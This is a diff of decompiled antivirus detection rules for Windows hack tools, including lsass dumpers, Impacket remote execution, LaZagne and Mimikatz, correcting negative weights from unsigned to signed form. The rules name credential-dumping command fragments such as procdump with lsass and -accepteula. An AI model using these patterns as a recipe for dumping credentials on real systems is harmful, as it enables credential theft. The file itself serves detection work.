$a_00_0 = {5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 41 00 7a 00 75 00 72 00 65 00 57 00 61 00 74 00 73 00 6f 00 6e 00 5c 00 30 00 5c 00 70 00 72 00 6f 00 63 00 64 00 75 00 6d 00 70 00 } //65534 \ProgramData\Microsoft\AzureWatson\0\procdump
|
||||
$a_02_1 = {2d 00 6a 00 20 00 90 02 04 5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 5c 00 57 00 45 00 52 00 5c 00 52 00 65 00 70 00 6f 00 72 00 74 00 51 00 75 00 65 00 75 00 65 00 90 00 } //65534
|
||||
$a_00_0 = {5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 41 00 7a 00 75 00 72 00 65 00 57 00 61 00 74 00 73 00 6f 00 6e 00 5c 00 30 00 5c 00 70 00 72 00 6f 00 63 00 64 00 75 00 6d 00 70 00 } //-2 \ProgramData\Microsoft\AzureWatson\0\procdump
|
||||
$a_02_1 = {2d 00 6a 00 20 00 90 02 04 5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 5c 00 57 00 45 00 52 00 5c 00 52 00 65 00 70 00 6f 00 72 00 74 00 51 00 75 00 65 00 75 00 65 00 90 00 } //-2
|
||||
$a_00_2 = {5c 00 70 00 72 00 6f 00 63 00 64 00 75 00 6d 00 70 00 2e 00 65 00 78 00 65 00 } //2 \procdump.exe
|
||||
$a_00_3 = {2d 00 6d 00 } //1 -m
|
||||
$a_00_4 = {2f 00 6d 00 } //1 /m
|
||||
condition:
|
||||
((#a_00_0 & 1)*65534+(#a_02_1 & 1)*65534+(#a_00_2 & 1)*2+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1) >=3
|
||||
((#a_00_0 & 1)*-2+(#a_02_1 & 1)*-2+(#a_00_2 & 1)*2+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1) >=3
|
||||
|
||||
}
|
||||
|
|
@ -4,12 +4,12 @@ rule HackTool_Win32_DumpLsass_C{
|
|||
description = "HackTool:Win32/DumpLsass.C,SIGNATURE_TYPE_CMDHSTR_EXT,0f 00 0f 00 05 00 00 "
|
||||
|
||||
strings :
|
||||
$a_00_0 = {5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 41 00 7a 00 75 00 72 00 65 00 57 00 61 00 74 00 73 00 6f 00 6e 00 5c 00 30 00 5c 00 70 00 72 00 6f 00 63 00 64 00 75 00 6d 00 70 00 } //65526 \ProgramData\Microsoft\AzureWatson\0\procdump
|
||||
$a_02_1 = {2d 00 6a 00 20 00 90 02 04 5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 5c 00 57 00 45 00 52 00 5c 00 52 00 65 00 70 00 6f 00 72 00 74 00 51 00 75 00 65 00 75 00 65 00 90 00 } //65526
|
||||
$a_00_0 = {5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 41 00 7a 00 75 00 72 00 65 00 57 00 61 00 74 00 73 00 6f 00 6e 00 5c 00 30 00 5c 00 70 00 72 00 6f 00 63 00 64 00 75 00 6d 00 70 00 } //-10 \ProgramData\Microsoft\AzureWatson\0\procdump
|
||||
$a_02_1 = {2d 00 6a 00 20 00 90 02 04 5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 5c 00 57 00 45 00 52 00 5c 00 52 00 65 00 70 00 6f 00 72 00 74 00 51 00 75 00 65 00 75 00 65 00 90 00 } //-10
|
||||
$a_00_2 = {5c 00 70 00 72 00 6f 00 63 00 64 00 75 00 6d 00 70 00 2e 00 65 00 78 00 65 00 } //10 \procdump.exe
|
||||
$a_00_3 = {2d 00 6d 00 } //5 -m
|
||||
$a_00_4 = {2f 00 6d 00 } //5 /m
|
||||
condition:
|
||||
((#a_00_0 & 1)*65526+(#a_02_1 & 1)*65526+(#a_00_2 & 1)*10+(#a_00_3 & 1)*5+(#a_00_4 & 1)*5) >=15
|
||||
((#a_00_0 & 1)*-10+(#a_02_1 & 1)*-10+(#a_00_2 & 1)*10+(#a_00_3 & 1)*5+(#a_00_4 & 1)*5) >=15
|
||||
|
||||
}
|
||||
|
|
@ -4,12 +4,12 @@ rule HackTool_Win32_DumpLsass_E{
|
|||
description = "HackTool:Win32/DumpLsass.E,SIGNATURE_TYPE_CMDHSTR_EXT,0f 00 0f 00 05 00 00 "
|
||||
|
||||
strings :
|
||||
$a_00_0 = {5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 41 00 7a 00 75 00 72 00 65 00 57 00 61 00 74 00 73 00 6f 00 6e 00 5c 00 30 00 5c 00 70 00 72 00 6f 00 63 00 64 00 75 00 6d 00 70 00 } //65516 \ProgramData\Microsoft\AzureWatson\0\procdump
|
||||
$a_02_1 = {2d 00 6a 00 20 00 90 02 04 5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 5c 00 57 00 45 00 52 00 5c 00 52 00 65 00 70 00 6f 00 72 00 74 00 51 00 75 00 65 00 75 00 65 00 90 00 } //65516
|
||||
$a_00_0 = {5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 41 00 7a 00 75 00 72 00 65 00 57 00 61 00 74 00 73 00 6f 00 6e 00 5c 00 30 00 5c 00 70 00 72 00 6f 00 63 00 64 00 75 00 6d 00 70 00 } //-20 \ProgramData\Microsoft\AzureWatson\0\procdump
|
||||
$a_02_1 = {2d 00 6a 00 20 00 90 02 04 5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 5c 00 57 00 45 00 52 00 5c 00 52 00 65 00 70 00 6f 00 72 00 74 00 51 00 75 00 65 00 75 00 65 00 90 00 } //-20
|
||||
$a_00_2 = {5c 00 70 00 72 00 6f 00 63 00 64 00 75 00 6d 00 70 00 } //10 \procdump
|
||||
$a_00_3 = {20 00 6c 00 73 00 61 00 73 00 73 00 20 00 } //5 lsass
|
||||
$a_00_4 = {20 00 6c 00 73 00 61 00 73 00 73 00 2e 00 65 00 78 00 65 00 20 00 } //5 lsass.exe
|
||||
condition:
|
||||
((#a_00_0 & 1)*65516+(#a_02_1 & 1)*65516+(#a_00_2 & 1)*10+(#a_00_3 & 1)*5+(#a_00_4 & 1)*5) >=15
|
||||
((#a_00_0 & 1)*-20+(#a_02_1 & 1)*-20+(#a_00_2 & 1)*10+(#a_00_3 & 1)*5+(#a_00_4 & 1)*5) >=15
|
||||
|
||||
}
|
||||
|
|
@ -4,12 +4,12 @@ rule HackTool_Win32_DumpLsass_F{
|
|||
description = "HackTool:Win32/DumpLsass.F,SIGNATURE_TYPE_CMDHSTR_EXT,69 00 14 00 05 00 00 "
|
||||
|
||||
strings :
|
||||
$a_00_0 = {5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 41 00 7a 00 75 00 72 00 65 00 57 00 61 00 74 00 73 00 6f 00 6e 00 5c 00 30 00 5c 00 70 00 72 00 6f 00 63 00 64 00 75 00 6d 00 70 00 } //65516 \ProgramData\Microsoft\AzureWatson\0\procdump
|
||||
$a_02_1 = {2d 00 6a 00 20 00 90 02 04 5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 5c 00 57 00 45 00 52 00 5c 00 52 00 65 00 70 00 6f 00 72 00 74 00 51 00 75 00 65 00 75 00 65 00 90 00 } //65516
|
||||
$a_00_2 = {73 00 69 00 67 00 63 00 68 00 65 00 63 00 6b 00 36 00 34 00 2e 00 65 00 78 00 65 00 } //65516 sigcheck64.exe
|
||||
$a_00_0 = {5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 41 00 7a 00 75 00 72 00 65 00 57 00 61 00 74 00 73 00 6f 00 6e 00 5c 00 30 00 5c 00 70 00 72 00 6f 00 63 00 64 00 75 00 6d 00 70 00 } //-20 \ProgramData\Microsoft\AzureWatson\0\procdump
|
||||
$a_02_1 = {2d 00 6a 00 20 00 90 02 04 5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 5c 00 57 00 45 00 52 00 5c 00 52 00 65 00 70 00 6f 00 72 00 74 00 51 00 75 00 65 00 75 00 65 00 90 00 } //-20
|
||||
$a_00_2 = {73 00 69 00 67 00 63 00 68 00 65 00 63 00 6b 00 36 00 34 00 2e 00 65 00 78 00 65 00 } //-20 sigcheck64.exe
|
||||
$a_00_3 = {2d 00 61 00 63 00 63 00 65 00 70 00 74 00 65 00 75 00 6c 00 61 00 } //10 -accepteula
|
||||
$a_00_4 = {6c 00 73 00 61 00 73 00 73 00 } //10 lsass
|
||||
condition:
|
||||
((#a_00_0 & 1)*65516+(#a_02_1 & 1)*65516+(#a_00_2 & 1)*65516+(#a_00_3 & 1)*10+(#a_00_4 & 1)*10) >=20
|
||||
((#a_00_0 & 1)*-20+(#a_02_1 & 1)*-20+(#a_00_2 & 1)*-20+(#a_00_3 & 1)*10+(#a_00_4 & 1)*10) >=20
|
||||
|
||||
}
|
||||
|
|
@ -4,13 +4,13 @@ rule HackTool_Win32_DumpLsass_G{
|
|||
description = "HackTool:Win32/DumpLsass.G,SIGNATURE_TYPE_CMDHSTR_EXT,0f 00 0f 00 06 00 00 "
|
||||
|
||||
strings :
|
||||
$a_00_0 = {5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 41 00 7a 00 75 00 72 00 65 00 57 00 61 00 74 00 73 00 6f 00 6e 00 5c 00 30 00 5c 00 70 00 72 00 6f 00 63 00 64 00 75 00 6d 00 70 00 } //65516 \ProgramData\Microsoft\AzureWatson\0\procdump
|
||||
$a_00_1 = {5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 5c 00 57 00 45 00 52 00 5c 00 52 00 65 00 70 00 6f 00 72 00 74 00 51 00 75 00 65 00 75 00 65 00 90 00 00 00 } //65516
|
||||
$a_00_0 = {5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 41 00 7a 00 75 00 72 00 65 00 57 00 61 00 74 00 73 00 6f 00 6e 00 5c 00 30 00 5c 00 70 00 72 00 6f 00 63 00 64 00 75 00 6d 00 70 00 } //-20 \ProgramData\Microsoft\AzureWatson\0\procdump
|
||||
$a_00_1 = {5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 44 00 61 00 74 00 61 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 5c 00 57 00 45 00 52 00 5c 00 52 00 65 00 70 00 6f 00 72 00 74 00 51 00 75 00 65 00 75 00 65 00 90 00 00 00 } //-20
|
||||
$a_00_2 = {2d 00 61 00 63 00 63 00 65 00 70 00 74 00 65 00 75 00 6c 00 61 00 } //10 -accepteula
|
||||
$a_00_3 = {2d 00 6d 00 } //5 -m
|
||||
$a_00_4 = {2f 00 6d 00 } //5 /m
|
||||
$a_00_5 = {2e 00 64 00 6d 00 70 00 } //5 .dmp
|
||||
condition:
|
||||
((#a_00_0 & 1)*65516+(#a_00_1 & 1)*65516+(#a_00_2 & 1)*10+(#a_00_3 & 1)*5+(#a_00_4 & 1)*5+(#a_00_5 & 1)*5) >=15
|
||||
((#a_00_0 & 1)*-20+(#a_00_1 & 1)*-20+(#a_00_2 & 1)*10+(#a_00_3 & 1)*5+(#a_00_4 & 1)*5+(#a_00_5 & 1)*5) >=15
|
||||
|
||||
}
|
||||
|
|
@ -5,11 +5,11 @@ rule HackTool_Win32_FindAVsignature_A{
|
|||
|
||||
strings :
|
||||
$a_80_0 = {46 69 6e 64 2d 41 56 53 69 67 6e 61 74 75 72 65 } //Find-AVSignature 10
|
||||
$a_01_1 = {68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 64 00 6f 00 74 00 6e 00 65 00 74 00 63 00 6c 00 69 00 2e 00 62 00 6c 00 6f 00 62 00 2e 00 63 00 6f 00 72 00 65 00 2e 00 77 00 69 00 6e 00 64 00 6f 00 77 00 73 00 2e 00 6e 00 65 00 74 00 2f 00 } //65531 https://dotnetcli.blob.core.windows.net/
|
||||
$a_01_2 = {2d 00 54 00 65 00 6e 00 61 00 6e 00 74 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 50 00 61 00 73 00 73 00 77 00 6f 00 72 00 64 00 } //65531 -TenantServicePassword
|
||||
$a_01_3 = {52 00 61 00 70 00 69 00 64 00 37 00 20 00 41 00 67 00 65 00 6e 00 74 00 } //65531 Rapid7 Agent
|
||||
$a_01_4 = {5c 4d 53 54 49 43 57 65 66 44 65 74 65 63 74 69 6f 6e 73 5c 4c 69 62 5c 50 6f 77 65 72 73 68 65 6c 6c 50 61 72 73 65 72 5c 6f 62 6a 5c 61 6d 64 36 34 5c 50 6f 77 65 72 73 68 65 6c 6c 50 61 72 73 65 72 2e 70 64 62 } //65526 \MSTICWefDetections\Lib\PowershellParser\obj\amd64\PowershellParser.pdb
|
||||
$a_01_1 = {68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 64 00 6f 00 74 00 6e 00 65 00 74 00 63 00 6c 00 69 00 2e 00 62 00 6c 00 6f 00 62 00 2e 00 63 00 6f 00 72 00 65 00 2e 00 77 00 69 00 6e 00 64 00 6f 00 77 00 73 00 2e 00 6e 00 65 00 74 00 2f 00 } //-5 https://dotnetcli.blob.core.windows.net/
|
||||
$a_01_2 = {2d 00 54 00 65 00 6e 00 61 00 6e 00 74 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 50 00 61 00 73 00 73 00 77 00 6f 00 72 00 64 00 } //-5 -TenantServicePassword
|
||||
$a_01_3 = {52 00 61 00 70 00 69 00 64 00 37 00 20 00 41 00 67 00 65 00 6e 00 74 00 } //-5 Rapid7 Agent
|
||||
$a_01_4 = {5c 4d 53 54 49 43 57 65 66 44 65 74 65 63 74 69 6f 6e 73 5c 4c 69 62 5c 50 6f 77 65 72 73 68 65 6c 6c 50 61 72 73 65 72 5c 6f 62 6a 5c 61 6d 64 36 34 5c 50 6f 77 65 72 73 68 65 6c 6c 50 61 72 73 65 72 2e 70 64 62 } //-10 \MSTICWefDetections\Lib\PowershellParser\obj\amd64\PowershellParser.pdb
|
||||
condition:
|
||||
((#a_80_0 & 1)*10+(#a_01_1 & 1)*65531+(#a_01_2 & 1)*65531+(#a_01_3 & 1)*65531+(#a_01_4 & 1)*65526) >=100
|
||||
((#a_80_0 & 1)*10+(#a_01_1 & 1)*-5+(#a_01_2 & 1)*-5+(#a_01_3 & 1)*-5+(#a_01_4 & 1)*-10) >=100
|
||||
|
||||
}
|
||||
|
|
@ -19,9 +19,9 @@ rule HackTool_Win32_ImpacketExec_SA{
|
|||
$a_00_12 = {72 00 75 00 6e 00 64 00 6c 00 6c 00 33 00 32 00 } //1 rundll32
|
||||
$a_00_13 = {72 00 65 00 67 00 73 00 76 00 72 00 33 00 32 00 } //1 regsvr32
|
||||
$a_00_14 = {63 00 3a 00 5c 00 70 00 65 00 72 00 66 00 6c 00 6f 00 67 00 73 00 } //1 c:\perflogs
|
||||
$a_02_15 = {70 00 6f 00 77 00 65 00 72 00 73 00 68 00 65 00 6c 00 6c 00 90 08 00 02 68 00 69 00 64 00 65 00 74 00 61 00 62 00 6c 00 65 00 68 00 65 00 61 00 64 00 65 00 72 00 73 00 90 00 } //65436
|
||||
$a_00_16 = {62 00 6b 00 6e 00 6f 00 64 00 65 00 6d 00 61 00 6e 00 } //65436 bknodeman
|
||||
$a_02_15 = {70 00 6f 00 77 00 65 00 72 00 73 00 68 00 65 00 6c 00 6c 00 90 08 00 02 68 00 69 00 64 00 65 00 74 00 61 00 62 00 6c 00 65 00 68 00 65 00 61 00 64 00 65 00 72 00 73 00 90 00 } //-100
|
||||
$a_00_16 = {62 00 6b 00 6e 00 6f 00 64 00 65 00 6d 00 61 00 6e 00 } //-100 bknodeman
|
||||
condition:
|
||||
((#a_00_0 & 1)*10+(#a_00_1 & 1)*10+(#a_00_2 & 1)*10+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_00_8 & 1)*1+(#a_00_9 & 1)*1+(#a_00_10 & 1)*1+(#a_00_11 & 1)*1+(#a_00_12 & 1)*1+(#a_00_13 & 1)*1+(#a_00_14 & 1)*1+(#a_02_15 & 1)*65436+(#a_00_16 & 1)*65436) >=31
|
||||
((#a_00_0 & 1)*10+(#a_00_1 & 1)*10+(#a_00_2 & 1)*10+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_00_8 & 1)*1+(#a_00_9 & 1)*1+(#a_00_10 & 1)*1+(#a_00_11 & 1)*1+(#a_00_12 & 1)*1+(#a_00_13 & 1)*1+(#a_00_14 & 1)*1+(#a_02_15 & 1)*-100+(#a_00_16 & 1)*-100) >=31
|
||||
|
||||
}
|
||||
|
|
@ -8,8 +8,8 @@ rule HackTool_Win32_Impacketwmiexec_D{
|
|||
$a_00_1 = {20 00 2f 00 63 00 20 00 } //1 /c
|
||||
$a_00_2 = {20 00 2f 00 51 00 20 00 } //1 /Q
|
||||
$a_02_3 = {20 00 5c 00 5c 00 90 29 03 00 2e 00 90 29 03 00 2e 00 90 29 03 00 2e 00 90 29 03 00 5c 00 90 02 20 5c 00 90 02 20 2e 00 62 00 61 00 74 00 90 00 } //10
|
||||
$a_00_4 = {5c 00 5c 00 31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 5c 00 } //65436 \\127.0.0.1\
|
||||
$a_00_4 = {5c 00 5c 00 31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 5c 00 } //-100 \\127.0.0.1\
|
||||
condition:
|
||||
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_02_3 & 1)*10+(#a_00_4 & 1)*65436) >=13
|
||||
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_02_3 & 1)*10+(#a_00_4 & 1)*-100) >=13
|
||||
|
||||
}
|
||||
|
|
@ -8,8 +8,8 @@ rule HackTool_Win32_Impacketwmiexec_RD{
|
|||
$a_00_1 = {20 00 2f 00 63 00 20 00 } //1 /c
|
||||
$a_00_2 = {20 00 2f 00 51 00 20 00 } //1 /Q
|
||||
$a_02_3 = {20 00 5c 00 5c 00 90 29 03 00 2e 00 90 29 03 00 2e 00 90 29 03 00 2e 00 90 29 03 00 5c 00 90 02 20 5c 00 90 02 20 2e 00 62 00 61 00 74 00 90 00 } //100
|
||||
$a_00_4 = {5c 00 5c 00 31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 5c 00 } //65436 \\127.0.0.1\
|
||||
$a_00_4 = {5c 00 5c 00 31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 5c 00 } //-100 \\127.0.0.1\
|
||||
condition:
|
||||
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_02_3 & 1)*100+(#a_00_4 & 1)*65436) >=103
|
||||
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_00_2 & 1)*1+(#a_02_3 & 1)*100+(#a_00_4 & 1)*-100) >=103
|
||||
|
||||
}
|
||||
|
|
@ -4,8 +4,8 @@ rule HackTool_Win32_LaZagne{
|
|||
description = "HackTool:Win32/LaZagne,SIGNATURE_TYPE_PEHSTR_EXT,0b 00 0b 00 10 00 00 "
|
||||
|
||||
strings :
|
||||
$a_80_0 = {4d 69 63 72 6f 73 6f 66 74 2e 43 79 62 65 72 2e 4f 62 73 65 72 76 61 74 69 6f 6e 44 65 74 65 63 74 6f 72 73 2e 64 6c 6c } //Microsoft.Cyber.ObservationDetectors.dll 65516
|
||||
$a_80_1 = {4f 6e 65 43 79 62 65 72 46 54 40 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d } //OneCyberFT@microsoft.com 65516
|
||||
$a_80_0 = {4d 69 63 72 6f 73 6f 66 74 2e 43 79 62 65 72 2e 4f 62 73 65 72 76 61 74 69 6f 6e 44 65 74 65 63 74 6f 72 73 2e 64 6c 6c } //Microsoft.Cyber.ObservationDetectors.dll -20
|
||||
$a_80_1 = {4f 6e 65 43 79 62 65 72 46 54 40 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d } //OneCyberFT@microsoft.com -20
|
||||
$a_80_2 = {6c 61 5a 61 67 6e 65 2e 65 78 65 2e 6d 61 6e 69 66 65 73 74 } //laZagne.exe.manifest 6
|
||||
$a_80_3 = {6c 61 7a 61 67 6e 65 2e 63 6f 6e 66 69 67 } //lazagne.config 3
|
||||
$a_80_4 = {6c 61 7a 61 67 6e 65 2e 73 6f 66 74 77 61 72 65 73 } //lazagne.softwares 3
|
||||
|
|
@ -21,6 +21,6 @@ rule HackTool_Win32_LaZagne{
|
|||
$a_80_14 = {2e 67 69 74 2e 67 69 74 66 6f 72 77 69 6e 64 6f 77 73 } //.git.gitforwindows 1
|
||||
$a_80_15 = {2e 73 79 73 61 64 6d 69 6e 2e 61 70 61 63 68 65 64 69 72 65 63 74 6f 72 79 73 74 75 64 69 6f } //.sysadmin.apachedirectorystudio 1
|
||||
condition:
|
||||
((#a_80_0 & 1)*65516+(#a_80_1 & 1)*65516+(#a_80_2 & 1)*6+(#a_80_3 & 1)*3+(#a_80_4 & 1)*3+(#a_80_5 & 1)*3+(#a_80_6 & 1)*2+(#a_80_7 & 1)*3+(#a_80_8 & 1)*2+(#a_80_9 & 1)*2+(#a_80_10 & 1)*2+(#a_80_11 & 1)*1+(#a_80_12 & 1)*1+(#a_80_13 & 1)*1+(#a_80_14 & 1)*1+(#a_80_15 & 1)*1) >=11
|
||||
((#a_80_0 & 1)*-20+(#a_80_1 & 1)*-20+(#a_80_2 & 1)*6+(#a_80_3 & 1)*3+(#a_80_4 & 1)*3+(#a_80_5 & 1)*3+(#a_80_6 & 1)*2+(#a_80_7 & 1)*3+(#a_80_8 & 1)*2+(#a_80_9 & 1)*2+(#a_80_10 & 1)*2+(#a_80_11 & 1)*1+(#a_80_12 & 1)*1+(#a_80_13 & 1)*1+(#a_80_14 & 1)*1+(#a_80_15 & 1)*1) >=11
|
||||
|
||||
}
|
||||
|
|
@ -10,14 +10,14 @@ rule HackTool_Win32_Mikatz_dha_{
|
|||
$a_00_3 = {45 00 52 00 52 00 4f 00 52 00 20 00 6b 00 75 00 68 00 6c 00 5f 00 6d 00 5f 00 63 00 72 00 79 00 70 00 74 00 6f 00 5f 00 6c 00 5f 00 63 00 65 00 72 00 74 00 69 00 66 00 69 00 63 00 61 00 74 00 65 00 73 00 20 00 3b 00 20 00 43 00 72 00 79 00 70 00 74 00 41 00 63 00 71 00 75 00 69 00 72 00 65 00 43 00 65 00 72 00 74 00 69 00 66 00 69 00 63 00 61 00 74 00 65 00 50 00 72 00 69 00 76 00 61 00 74 00 65 00 4b 00 65 00 79 00 20 00 28 00 30 00 78 00 25 00 30 00 38 00 78 00 29 00 } //1 ERROR kuhl_m_crypto_l_certificates ; CryptAcquireCertificatePrivateKey (0x%08x)
|
||||
$a_00_4 = {45 00 52 00 52 00 4f 00 52 00 20 00 6b 00 75 00 68 00 6c 00 5f 00 6d 00 5f 00 63 00 72 00 79 00 70 00 74 00 6f 00 5f 00 6c 00 5f 00 63 00 65 00 72 00 74 00 69 00 66 00 69 00 63 00 61 00 74 00 65 00 73 00 20 00 3b 00 20 00 43 00 65 00 72 00 74 00 47 00 65 00 74 00 43 00 65 00 72 00 74 00 69 00 66 00 69 00 63 00 61 00 74 00 65 00 43 00 6f 00 6e 00 74 00 65 00 78 00 74 00 50 00 72 00 6f 00 70 00 65 00 72 00 74 00 79 00 20 00 28 00 30 00 78 00 25 00 30 00 38 00 78 00 29 00 } //1 ERROR kuhl_m_crypto_l_certificates ; CertGetCertificateContextProperty (0x%08x)
|
||||
$a_00_5 = {45 00 52 00 52 00 4f 00 52 00 20 00 6b 00 75 00 68 00 6c 00 5f 00 6d 00 5f 00 63 00 72 00 79 00 70 00 74 00 6f 00 5f 00 6c 00 5f 00 63 00 65 00 72 00 74 00 69 00 66 00 69 00 63 00 61 00 74 00 65 00 73 00 20 00 3b 00 20 00 43 00 65 00 72 00 74 00 47 00 65 00 74 00 4e 00 61 00 6d 00 65 00 53 00 74 00 72 00 69 00 6e 00 67 00 20 00 28 00 30 00 78 00 25 00 30 00 38 00 78 00 29 00 } //1 ERROR kuhl_m_crypto_l_certificates ; CertGetNameString (0x%08x)
|
||||
$a_80_6 = {77 69 6e 64 6f 77 73 5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 } //windows\kevlar-api\kevlarsigs 65516
|
||||
$a_80_7 = {5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 36 34 5c 78 36 34 5c 72 65 6c 65 61 73 65 5c 48 49 50 48 61 6e 64 6c 65 72 73 36 34 2e 70 64 62 } //\kevlar-api\kevlarsigs64\x64\release\HIPHandlers64.pdb 65516
|
||||
$a_80_8 = {5c 6d 63 61 66 65 65 5c 68 6f 73 74 20 69 6e 74 72 75 73 69 6f 6e 20 70 72 65 76 65 6e 74 69 6f 6e 5c 68 69 70 } //\mcafee\host intrusion prevention\hip 65516
|
||||
$a_80_9 = {5c 73 64 6b 2e 70 72 6f 74 65 63 74 6f 72 5c 6d 69 6e 6f 72 5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 36 34 2e 70 64 62 } //\sdk.protector\minor\x64\Release\Protector64.pdb 65516
|
||||
$a_80_10 = {6d 6f 72 70 68 69 73 65 63 5f 64 6c 6c 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_dll_version_s 65516
|
||||
$a_80_11 = {6d 6f 72 70 68 69 73 65 63 5f 70 72 6f 64 75 63 74 5f 76 65 72 73 69 6f 6e 5f 73 } //morphisec_product_version_s 65516
|
||||
$a_80_12 = {5c 78 36 34 5c 52 65 6c 65 61 73 65 5c 50 72 6f 74 65 63 74 6f 72 53 65 72 76 69 63 65 36 34 2e 70 64 62 } //\x64\Release\ProtectorService64.pdb 65516
|
||||
$a_80_6 = {77 69 6e 64 6f 77 73 5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 } //windows\kevlar-api\kevlarsigs -20
|
||||
$a_80_7 = {5c 6b 65 76 6c 61 72 2d 61 70 69 5c 6b 65 76 6c 61 72 73 69 67 73 36 34 5c 78 36 34 5c 72 65 6c 65 61 73 65 5c 48 49 50 48 61 6e 64 6c 65 72 73 36 34 2e 70 64 62 } //\kevlar-api\kevlarsigs64\x64\release\HIPHandlers64.pdb -20
|
||||
